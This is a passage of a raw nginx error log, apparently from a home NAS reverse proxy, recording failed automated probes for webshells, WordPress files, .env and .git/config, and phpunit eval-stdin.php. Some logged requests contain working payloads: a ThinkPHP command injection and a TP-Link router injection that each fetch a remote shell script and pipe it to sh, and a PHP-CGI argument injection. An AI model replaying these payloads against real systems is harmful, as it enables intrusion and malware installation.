HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:10 [error] 279#279: *20208 open() "/var/www/html/ppp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ppp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:10 [error] 279#279: *20208 open() "/var/www/html/tox.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /tox.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:10 [error] 279#279: *20208 open() "/var/www/html/bless11.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bless11.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:10 [error] 279#279: *20208 open() "/var/www/html/030.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /030.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:11 [error] 279#279: *20208 open() "/var/www/html/v4.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /v4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:11 [error] 279#279: *20208 open() "/var/www/html/xxx.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:11 [error] 279#279: *20208 open() "/var/www/html/fs.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /fs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:11 [error] 279#279: *20208 open() "/var/www/html/33.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /33.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:11 [error] 279#279: *20208 open() "/var/www/html/v2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /v2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 20:46:12 [error] 279#279: *20208 open() "/var/www/html/new4.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /new4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/21 21:21:40 [error] 280#280: *20251 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/21 21:30:15 [error] 280#280: *20259 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 22:20:46 [error] 279#279: *21799 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 71.6.146.186, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/21 22:20:47 [error] 279#279: *21800 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 71.6.146.186, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.83.208" +2026/01/21 22:20:48 [error] 279#279: *21801 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 71.6.146.186, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/21 22:27:43 [error] 278#278: *23301 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 22:34:46 [error] 278#278: *23307 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/21 22:46:07 [error] 278#278: *23320 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 22:54:17 [error] 278#278: *23328 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 23:06:49 [error] 287#287: *23338 open() "/var/www/html/wp-includes/ID3/license.txt" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/license.txt HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:49 [error] 287#287: *23338 "/var/www/html/feed/index.html" is not found (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /feed/ HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:49 [error] 287#287: *23338 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php?rsd HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:49 [error] 287#287: *23338 open() "/var/www/html/blog/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:50 [error] 287#287: *23338 open() "/var/www/html/web/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:50 [error] 287#287: *23338 open() "/var/www/html/wordpress/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:50 [error] 287#287: *23338 open() "/var/www/html/wp/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:50 [error] 287#287: *23338 open() "/var/www/html/2020/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:51 [error] 287#287: *23338 open() "/var/www/html/2019/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:51 [error] 287#287: *23338 open() "/var/www/html/2021/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /2021/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:51 [error] 287#287: *23338 open() "/var/www/html/shop/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:51 [error] 287#287: *23338 open() "/var/www/html/wp1/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:52 [error] 287#287: *23338 open() "/var/www/html/test/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:52 [error] 287#287: *23338 open() "/var/www/html/site/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:06:52 [error] 287#287: *23338 open() "/var/www/html/cms/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 91.224.92.99, server: localhost-nginx-proxy-manager, request: "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1", host: "pma.profibot.synology.me" +2026/01/21 23:37:19 [error] 285#285: *23362 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/21 23:47:07 [error] 285#285: *23385 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 00:33:17 [error] 285#285: *23422 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 00:53:32 [error] 286#286: *23445 open() "/var/www/html/wiki" failed (2: No such file or directory), client: 206.168.34.194, server: localhost-nginx-proxy-manager, request: "GET /wiki HTTP/1.1", host: "91.82.83.208" +2026/01/22 01:41:47 [error] 287#287: *23485 open() "/var/www/html/login" failed (2: No such file or directory), client: 103.252.89.75, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/22 02:04:03 [error] 287#287: *23521 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 02:32:38 [error] 287#287: *23548 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 02:39:44 [error] 287#287: *23555 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 03:36:21 [error] 288#288: *23620 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/22 03:36:21 [error] 288#288: *23621 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D6f71068b%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/22 03:36:21 [error] 285#285: *23622 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/22 04:07:59 [error] 285#285: *23650 open() "/var/www/html/_next" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 04:07:59 [error] 285#285: *23651 open() "/var/www/html/api" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 04:08:00 [error] 285#285: *23652 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 04:08:00 [error] 285#285: *23653 open() "/var/www/html/app" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 04:08:00 [error] 285#285: *23654 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 04:37:44 [error] 286#286: *23681 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 45.115.89.49, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/22 05:09:25 [error] 294#294: *23728 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 05:56:34 [error] 292#292: *23770 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 06:22:50 [error] 295#295: *25284 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 06:22:50 [error] 295#295: *25286 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 06:23:03 [error] 295#295: *25289 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 06:23:03 [error] 295#295: *25291 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 06:23:44 [error] 292#292: *25292 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.172, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/22 06:26:12 [error] 294#294: *26784 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.172, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/22 08:05:07 [error] 294#294: *28351 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 08:16:22 [error] 294#294: *28368 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 08:56:35 [error] 294#294: *28423 open() "/var/www/html/login" failed (2: No such file or directory), client: 103.252.89.75, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/22 08:57:36 [error] 294#294: *28424 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 09:08:34 [error] 295#295: *28434 open() "/var/www/html/.env" failed (2: No such file or directory), client: 91.92.241.199, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/22 09:13:44 [error] 295#295: *28437 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 64.34.87.123, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/22 09:21:16 [error] 295#295: *28443 open() "/var/www/html/.env" failed (2: No such file or directory), client: 159.203.33.77, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/22 09:21:16 [error] 295#295: *28444 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 159.203.33.77, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/22 09:46:57 [error] 295#295: *28467 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 09:49:28 [error] 295#295: *28470 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:12:43 [error] 295#295: *28488 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.65.194.85, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/22 10:36:28 [error] 292#292: *28516 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:38:01 [error] 292#292: *28519 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:38:14 [error] 292#292: *28522 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:38:15 [error] 292#292: *28523 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:06 [error] 292#292: *28553 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET 